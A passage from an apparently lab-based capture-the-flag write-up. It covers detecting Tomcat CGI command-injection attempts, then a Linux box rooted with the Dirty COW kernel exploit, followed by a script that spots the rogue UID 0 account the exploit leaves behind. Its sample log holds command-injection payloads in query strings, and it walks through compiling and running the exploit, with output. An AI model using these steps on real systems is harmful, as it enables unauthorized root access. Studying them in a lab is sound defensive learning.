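            hits.append((rec["client"], rec["target"], rec["status"]))
    return hits


# Constructed log: a benign CGI call, two injection attempts, an unrelated request, noise.
SAMPLE_LOG = [
    '10.10.214.41 - - [13/Dec/2020:10:55:01 +0000] "GET /cgi-bin/elfwhacker.bat?name=santa HTTP/1.1" 200 58',
    '10.10.214.41 - - [13/Dec/2020:10:56:07 +0000] "GET /cgi-bin/elfwhacker.bat?&dir HTTP/1.1" 200 1210',
    '10.10.214.41 - - [13/Dec/2020:10:56:09 +0000] "GET /cgi-bin/elfwhacker.bat?%26C%3A%5CWindows%5CSystem32%5Ccalc.exe HTTP/1.1" 200 0',
    '10.10.214.41 - - [13/Dec/2020:10:57:00 +0000] "GET /docs/config/?x=a&b=c HTTP/1.1" 200 4410',
    'garbage line that is not an access log entry',
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit)
```

On the fix side: set enableCmdLineArguments to false in the CGIServlet init-params of Tomcat's web.xml, or upgrade; Tomcat 9.0.18 and later default it to false, which is why the version leaked in the nmap fingerprint (9.0.17) mattered.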

Day 13: Coal For Christmas

As always, hit the deploy buttons. Once everything is booted up, we run a quick nmap scan.

root@ip-10-10-224-179:~# nmap 10.10.34.134

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-14 10:58 GMT
Nmap scan report for ip-10-10-34-134.eu-west-1.compute.internal (10.10.34.134)
Host is up (0.00082s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
23/tcp  open  telnet
111/tcp open  rpcbind
MAC Address: 02:91:2C:86:CD:15 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds

Telnet is an insecure predecessor of SSH, so let's connect with telnet 10.10.34.134 23. Luckily for us, we are provided with credentials in the greeting text.

First we get an idea of what system we are dealing with.

$ uname -a
Linux christmas 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"

With ls we have a look at what files we have in our home folder.

$ ls
christmas.sh  cookies_and_milk.txt

Looking at cookies_and_milk.txt we can answer the question of who got there first.

The challenge asks us to learn about Dirty COW (CVE-2016-5195), a race condition in the kernel's copy-on-write handling that lets an unprivileged user write to files it can only read. Let's do that.

On the site you can find a link to the code of the Dirty COW exploit. To get the code onto the box, I create a new file with nano dirty.c and paste the source. CTRL+O saves the file, CTRL+X closes the editor.

The comment header of the source we just copied explains how to compile the exploit, so let's do that with gcc -pthread dirty.c -o dirty -lcrypt.

Now we run the exploit. In my case, I went for the absolutely insecure password foo when prompted.

$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fiIoY9ux7Hzpc:0:0:pwned:/root:/bin/bash

mmap: 7f9ccb251000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'foo'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'foo'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

With su firefart we switch to the new user. cd ~ brings us to firefart's home, which is /root. In there we find message_from_the_grinch.txt.
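What the exploit just did to /etc/passwd is worth seeing from the other side. The following is an added example, not part of the writeup or of the exploit: a few checks a responder would run on a box like this one, over constructed passwd contents in which the firefart line is the one printed by the exploit above. The backup file name and the other accounts are assumptions.

```python
"""Added example, not from the writeup: what firefart's Dirty COW exploit leaves
in /etc/passwd and how to spot it. The exploit overwrites the start of the file,
i.e. root's entry, with a new UID 0 user whose DES crypt hash sits in passwd
itself, because /etc/shadow is not readable by the unprivileged user and so
cannot be mapped and overwritten through the bug. The passwd contents below
are constructed; only the firefart line is taken from the exploit output."""


def parse_passwd(text):
    """One dict per well-formed passwd line (7 colon-separated fields)."""
    users = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        users.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell, "raw": line})
    return users


def rogue_uid0_accounts(text, allowed=("root",)):
    """Accounts with UID 0 that are not in the allow list."""
    return [u["name"] for u in parse_passwd(text) if u["uid"] == 0 and u["name"] not in allowed]


def hashes_in_passwd(text):
    """Accounts whose password field holds a hash instead of the x/*/! shadow marker."""
    return [u["name"] for u in parse_passwd(text) if u["pw"] not in ("x", "*", "!", "")]


def passwd_diff(backup_text, current_text):
    """(removed, added) raw lines between the backup the exploit wrote and the live file."""
    before = {u["raw"] for u in parse_passwd(backup_text)}
    after = {u["raw"] for u in parse_passwd(current_text)}
    return sorted(before - after), sorted(after - before)


# Constructed: what /tmp/passwd.bak would hold (the file before the exploit ran)
BACKUP_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
santa:x:1000:1000:Santa Claus,,,:/home/santa:/bin/bash
"""
# Constructed: the same file after the exploit ran with password 'foo'
CURRENT_PASSWD = """firefart:fiIoY9ux7Hzpc:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
santa:x:1000:1000:Santa Claus,,,:/home/santa:/bin/bash
"""

if __name__ == "__main__":
    print("extra UID 0 accounts:", rogue_uid0_accounts(CURRENT_PASSWD))
    print("hashes stored in passwd:", hashes_in_passwd(CURRENT_PASSWD))
    print("diff against backup:", passwd_diff(BACKUP_PASSWD, CURRENT_PASSWD))
```

passwd_diff() is exactly the comparison the exploit's own DON'T FORGET TO RESTORE hint invites: the backup it wrote to /tmp/passwd.bak against the live file. The 13-character hash is the traditional DES crypt format, which is why the exploit is linked with -lcrypt.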

firefart@christmas:~# cat message_from_the_grinch.txt
Nice work, Santa!

Wow, this house sure was DIRTY!
I think they deserve coal for Christmas, don't you?
So let's leave some coal under the Christmas `tree`!

Let's work together on this. Leave this text file here,
and leave the christmas.sh script here too...
but, create a file named `coal` in this directory!
Then, inside this directory, pipe the output
of the `tree` command into the `md5sum` command.

The output of that command (the hash itself) is
the flag you can submit to complete this task
for the Advent of Cyber!

    - Yours,
        John Hammond
        er, sorry, I mean, the Grinch

      - THE GRINCH, SERIOUSLY

Following the instructions, we use touch coal to create the coal file, then run tree | md5sum to get the final answer.